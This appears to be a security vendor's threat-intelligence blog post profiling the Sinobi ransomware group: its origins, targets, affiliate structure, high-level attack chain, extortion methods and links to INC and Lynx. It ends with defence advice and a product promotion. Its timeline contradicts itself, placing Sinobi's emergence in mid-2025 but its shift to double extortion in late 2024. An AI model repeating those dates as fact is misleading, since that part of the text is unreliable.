Sinobi: The bougie-exclusive ransomware group that wants to be a ninja

The Sinobi ransomware brand emerged in mid-2025 and has quickly distinguished itself through calculated intrusions, disciplined operational security and a professional structure that reveals highly skilled and well-connected operators.

Sinobi is a hybrid ransomware-as-a-service (RaaS) organization. Core members work with well-screened affiliates to maintain centralized control and distributed operational capability. The group’s techniques improve as the group matures. Sinobi operations are notable for quiet intrusions, modular tooling, selective targeting, and a strong emphasis on both stealth and leverage. The group is also known for its extensive, sophisticated use of living-off-the-land (LotL) and living-off-the-land binaries (LOLBins).

Here’s your quick look at this group:

Name and location

The word Sinobi appears to be a deliberate stylized reference to ‘shinobi,’ which is an early Japanese term for ninja. Early internal communications on dark web forums showed affiliates using phrases such as “quiet in, quiet out,” reinforcing the belief the brand identity is meant to project ninja-like stealth and precision.

Despite the Japanese-inspired name, the communications patterns, linguistic quirks and activity windows indicate Russian and Eastern European origins. Sinobi tooling and negotiations are conducted primarily in Russian and English, with no evidence suggesting state affiliation. This is a financially motivated cybercrime group operating within a familiar regional ecosystem. Independent research by Rakesh Krishnan (The Raven File)  supports the location of at least one IP address in Russia: 

Sinobi offers clearweb mirrors of its dark web leak and chat sites, but the majority of its infrastructure remains on TOR-based resources, dark web forums, and encrypted messaging services like Telegram. This makes it difficult to view and capture the IP addresses of command-and-control (C2) servers.

Victimology, operations, and business model

Sinobi doesn’t appear to be aligned with state interests or any other ideology. The group focuses on organizations with very low tolerance for downtime or data leaks.  Manufacturing, business services, healthcare, financial services, education, and other sectors have all been victimized by Sinobi. The group rarely targets smaller companies, probably because of the low “return on (attack) investment.”

There is no publicly available information on “protected” regions or industries. However, Sinobi overwhelmingly focuses on entities in the United States, with secondary focus on Canada, Australia and allied countries. The group avoids targets that could draw a political or law enforcement response, particularly government agencies, utilities, and entities throughout the Eastern European region.

Sinobi is unlike open RaaS programs that allow affiliates to sign-up or apply to be an affiliate. The group relies on a private and vetted network of specialists who are known to the group or are introduced by trusted sources. This approach allows Sinobi to avoid recruiting activities like this:

Because Sinobi does not recruit like other RaaS groups, there’s no publicly available list of group rules, affiliate requirements, forbidden targets, or other operational details. This reduces the group’s exposure to law enforcement infiltration and limits available open-source intelligence (OSINT).

Researchers believe Sinobi’s core operators maintain the ransomware code and Tor-based infrastructure, conduct negotiations, manage the money laundering and ‘cashing out’ schemes, and enforce the rules of the group. Affiliates conduct the attacks from intrusion through ransomware deployment. This division of responsibilities is based on observed patterns in Sinobi operations, ransom notes, portal structures and negotiation processes. There is no public confirmation of this, and the revenue split between core members and affiliates is unknown.

Attack chain

Like most ransomware threats groups, Sinobi’s attack chain begins with getting initial access to the victim’s environment. The group has been observed using initial access brokers (IABs), phishing attacks via commodity phishing kits, and exploiting vulnerable VPNs, firewall appliances, or remote access systems such as Citrix or Fortinet. Sinobi will also use a compromised third-party and follow a supply chain to infiltrate a victim.

Sinobi operators follow a standard attack chain that shares many of the same patterns observed in RansomHub, ALPHV/BlackCat and other groups since the leak of Conti ransomware.

Once inside the system, Sinobi immediately begins a hands-on-keyboard intrusion that makes use of both custom tooling and living-off-the-land (LotL) abuse.  Threat actors begin privilege escalation and security evasion activities, including creating new administrator accounts, adjusting permissions, and disabling endpoint security tools. They also begin establishing persistence by configuring legitimate remote access tools.

Sinobi then drops a lightweight reconnaissance script that automates lateral movement and conducts additional security evasion tasks. The script is configured to enumerate domain information, locate file shares, identify privileged accounts, and check for endpoint security solutions that could disrupt the ransomware attack.

Data exfiltration begins once the attacker has completed reconnaissance and configured Rclone, WinSCP, or some other file transfer tool. The data is sent to cloud storage or another offsite location, and the ransomware binary is executed when this is complete.

There’s no single filename used for the ransomware binary, but it’s usually a generic or obfuscated name like “bin.exe.” This file deletes the Recycle Bin, encrypts the files, appends the .SINOBI extension, and drops the ransom note README.txt into every directory with encrypted files. It then changes the desktop wallpaper to an image that displays the text of the ransom note. 

The ransom note includes information on the communication process and the URLs of the TOR leak site. It also includes the URLs to the public clear web leak site. You can see the ransom note in its entirety here.

At this point, the Sinobi affiliate will let the core group takeover and manage communications, data leaks, etc.

Extortion and negotiation

Sinobi began as a single-extortion operation, but by late 2024 shifted to a full double-extortion approach using a Tor-hosted leak site. Victims are typically contacted through the ransom note mentioned above. If victims fail to engage, Sinobi escalates by posting data samples and contacting employees or customers. The group will also threaten the company with regulatory exposure under frameworks like GDPR, HIPAA, or SEC disclosure requirements.

Negotiations are handled by a small set of core operators who use templated communication patterns and pressure tactics tailored to the victim’s industry and regulatory posture. The goal is always to drive urgency, not panic—professional manipulation rather than chaos.

Friends and family

Sinobi’s story begins in mid-2023 when a threat actor known as INC ransomware emerged from apparently nowhere. INC is thought to be an original group with no lineage to other threat actors. It operated as a ransomware-as-a-service group until May 2024 when it was offered for sale on underground forums.

Shortly after the (presumed) sale, the INC leak site design was changed to this style:

INC activity diminished and a new group called Lynx emerged around the same time. There is no confirmation that Lynx operators purchased INC source code, but Lynx is clearly a successor to INC.

Upon close examination … significant overlap in shared functions strongly suggests that the developers of Lynx ransomware have borrowed and repurposed a considerable portion of the INC codebase to create their own malicious software. Via Unit42

Lynx was an active and aggressive threat for about one year, and then scaled back its activities in mid-2025. The group remains a threat, but its activity declined around the time Sinobi emerged in June 2025.

Sinobi is widely believed to be a rebrand, successor, or offshoot of Lynx ransomware. The Lynx leak site design is just one piece of supporting evidence for this: 

You can see the similarities between INC, Lynx, and Sinobi leak sites.

Beyond this, there are similarities in the encryption routine, victimology, double-extortion methodology, and operational procedures.

Sinobi takes full advantage of the threat ecosystem. It routinely purchases access from IABs, rents infrastructure from bulletproof hosting providers, sources credentials from darknet markets, and occasionally partners with botnet operators for phishing distribution. Their laundering and cashing out practices are indistinguishable from those used by Qilin and Akira.

Protect yourself

All indicators suggest that Sinobi is on a growth trajectory. As the ransomware market continues to fragment and evolve, Sinobi is well-positioned to expand its affiliate base, harden its tooling, and potentially add Linux or VMware ESXi-targeting variants. Their quiet professionalism and moderate posting frequency indicate a group that prefers sustainable income over explosive growth, which may help them avoid the fate of high-profile groups that attract aggressive law-enforcement pressure.

Sinobi represents an advanced and agile ransomware threat. Organizations can significantly reduce risk by focusing on credential management, employee awareness, proactive monitoring, and ongoing investments in backup, detection, and response workflows. Prevention and rapid response are currently the most effective means of defending against this threat.

Barracuda can help

Maximize your protection and cyber resilience with the BarracudaONE AI-powered cybersecurity platform. The platform protects your email, data, applications, and networks, and is strengthened by a 24/7 managed XDR service, unifying your security defenses and providing deep, intelligent threat detection and response. Manage your organization’s security posture with confidence, leveraging advanced protection, real-time analytics and proactive response capabilities. Robust reporting tools provide clear, actionable insights, helping you monitor risks, measure ROI and demonstrate operational impact. Don’t miss the opportunity to get a demo of the platform from our cybersecurity experts.